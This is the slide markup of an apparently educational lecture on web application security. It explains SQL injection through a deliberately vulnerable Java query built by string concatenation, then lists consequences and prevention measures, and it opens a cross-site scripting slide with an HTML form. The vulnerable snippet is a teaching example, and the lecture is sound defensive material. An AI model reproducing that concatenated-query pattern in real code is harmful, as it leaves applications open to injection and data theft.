              <a:ext cx="8405028" cy="242044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68880" y="1532959"/>
            <a:ext cx="7211273" cy="1972194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>
              <a:spcBef>
                <a:spcPts val="109"/>
              </a:spcBef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Another</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="3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example:</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="23"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="2496">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="591887"/>
            <a:r>
              <a:rPr sz="1407" spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://moviesite.com/dispatcher?action=profile&amp;id=1234567</a:t>
            </a:r>
            <a:endParaRPr sz="1407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61">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="591887" marR="4611">
              <a:lnSpc>
                <a:spcPts val="1824"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1180"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="603100"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="603100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id</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0"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request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.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>getParameter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(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id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)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="801B80"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="801B80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Statement</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9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stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80802F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>con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.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>createStatement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(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select</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-23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*</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-14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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-14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TBL_USERS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endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="591887">
              <a:lnSpc>
                <a:spcPts val="1774"/>
              </a:lnSpc>
            </a:pP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+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where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id</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5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='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+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id</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80802F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800D00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="032CE6"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="1543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4" y="553251"/>
            <a:ext cx="2996773" cy="5301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5119" y="553251"/>
            <a:ext cx="2120793" cy="5186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5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4"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="354" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="204" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="86" dirty="0"/>
              <a:t>Injection:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="208" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="86" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summary!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68880" y="1248981"/>
            <a:ext cx="7610075" cy="3384609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80094" marR="4611" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="86"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280094" algn="l"/>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pP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Problem:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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Client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inputs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SQL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code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using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input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parameters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(e.g.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 form).</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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These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parameters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are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then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used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dynamically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construct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SQL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queries.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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This</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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also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affects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ORM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solutions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such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as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1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Hibernate.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604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b="1" spc="36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Consequences:</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="664504" lvl="1" indent="-269721">
              <a:spcBef>
                <a:spcPts val="599"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="664504" algn="l"/>
                <a:tab pos="665080" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Loss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="14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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="23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77" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Confidentiality:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-59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Attackers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91" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can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access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sensitive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data.</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="664504" marR="447228" lvl="1" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="664504" algn="l"/>
                <a:tab pos="665080" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-64" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="9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73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Authorization:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-73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Attackers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91" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can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gain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access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to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privileged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accounts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or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systems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without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passwords.</a:t>
            </a:r>
            <a:endParaRPr sz="1951">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="664504" marR="503133" lvl="1" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="664504" algn="l"/>
                <a:tab pos="665080" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-86" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Integrity:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" i="1" spc="-59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Attackers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91" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can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change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information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stored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the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database.</a:t>
            </a:r>
            <a:endParaRPr sz="1951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9721" y="4714875"/>
            <a:ext cx="5952170" cy="18305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29797" y="6507497"/>
            <a:ext cx="2023974" cy="206623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271" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Source:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1271" spc="2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271" u="sng" spc="-9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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://xkcd.com/327/</a:t>
            </a:r>
            <a:endParaRPr sz="1271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4" y="553251"/>
            <a:ext cx="2996773" cy="5301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8171" y="553250"/>
            <a:ext cx="2524205" cy="4034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5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4"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="354" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="204" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="86" dirty="0"/>
              <a:t>Injection:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="208" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="41" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevention!!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31684" y="1438029"/>
            <a:ext cx="5601669" cy="4820643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80094" marR="23628" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="86"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280094" algn="l"/>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pP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Parameterized</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="1" spc="20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spc="172" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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statements:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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i.e.,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PreparedStatements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Parameter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values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are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quoted.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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This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preserves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intent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query.</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" indent="-269144">
              <a:spcBef>
                <a:spcPts val="604"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280094" algn="l"/>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" b="1" spc="77" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="1" spc="2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Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="1" spc="2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Procedures:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="1" spc="2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(but</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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implement</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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this</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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carefully).</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="130826" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280094" algn="l"/>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pP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Escape</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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user-input:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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All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user-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supplied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input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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should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escaped</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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(e.g.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using</a:t>
            </a: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double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quotes).</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="93941" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280094" algn="l"/>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pP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Whitelisting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="1" spc="2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(Positive</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="1" spc="2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filtering):</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="1" spc="2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Specify</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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2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set</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951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951" spc="2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characters</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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that</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="2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are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allowed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everything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else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2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rejected.</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="280094" marR="4611" indent="-269144">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="280094" algn="l"/>
                <a:tab pos="280671" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" b="1" spc="41" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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Settings:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="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Give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least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privilege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your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application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(only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213" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DB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reads,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="20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writes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="195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82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>only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where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required,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="195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use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non-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admin</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="195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accounts).</a:t>
            </a:r>
            <a:endParaRPr sz="1951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4BB8E-1D3C-FADA-21DF-8817CDB3F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779" y="2322499"/>
            <a:ext cx="4017759" cy="20990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B30603-08DC-19B0-CD9D-8A4FE4B377CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6372625" y="3429000"/>
            <a:ext cx="622407" cy="34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25BBD6F-839E-F04A-0630-9514BA112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35" y="4541647"/>
            <a:ext cx="1098010" cy="855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B0BBB-C1B4-605D-F936-206619F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04043-F8A3-40A0-AD75-064CA998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1C704-55A3-B131-D212-671103C5ED3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="1250730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How do attackers proceed?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51A50-AE5E-A16A-5486-FEA3EF1145F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="2312118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Web Application Security Vulnerabilities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7103-6E6B-AB68-1DC5-F4171CC4AC15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908983" y="3373506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Network Vulnerabilities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58FBA-15E7-E9DB-DFF8-C5130938CDEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908982" y="4434894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Ethical Hacking and Penetration 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4147A-06D5-2161-B675-FC11C82D98D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="908981" y="5496284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Useful Tools for PenTesting for Variouses Attack Phases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23206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4" y="576303"/>
            <a:ext cx="4794837" cy="4725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7079" y="553251"/>
            <a:ext cx="2939143" cy="4956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73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2"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3449" spc="86" dirty="0"/>
              <a:t>Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="208" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="213" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="77" dirty="0"/>
              <a:t>Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="213" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="64" dirty="0"/>
              <a:t>(XSS):</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="77" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="213" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="73" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="213" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3449" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D07B3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wrong?</a:t>
            </a:r>
            <a:endParaRPr sz="3449"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2477428" y="1446217"/>
            <a:ext cx="7237207" cy="4429461"/>
            <a:chOff x="1359570" y="1593517"/>
            <a:chExt cx="7974330" cy="4880610"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1575866" y="1854200"/>
              <a:ext cx="7537450" cy="4381500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7537450" h="4381500">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7537429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7537429" y="4381500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="438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A6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9570" y="1593517"/>
              <a:ext cx="7974260" cy="48802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912762" y="1904267"/>
            <a:ext cx="2619295" cy="47548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lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>FORM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9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ACTION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hello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5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spc="-45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  <a:p>
            <a:pPr marL="365391">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pP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dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>B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r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9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name</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="801B80"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="801B80"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="80802F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-18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2569" y="2368612"/>
            <a:ext cx="4035270" cy="475489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lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>NAME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name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TYPE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text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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="603100"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SIZE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“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10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  <a:p>
            <a:pPr marL="11527">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1543" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>TYPE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submit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14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VALUE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Now</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1543" spc="-5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click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”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2762" y="2368611"/>
            <a:ext cx="1085178" cy="706321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365391">
              <a:lnSpc>
                <a:spcPts val="1838"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>INPUT</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="365391">
              <a:lnSpc>
                <a:spcPts val="1828"/>
              </a:lnSpc>
            </a:pP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spc="-9" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>INPUT</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="11527">
              <a:lnSpc>
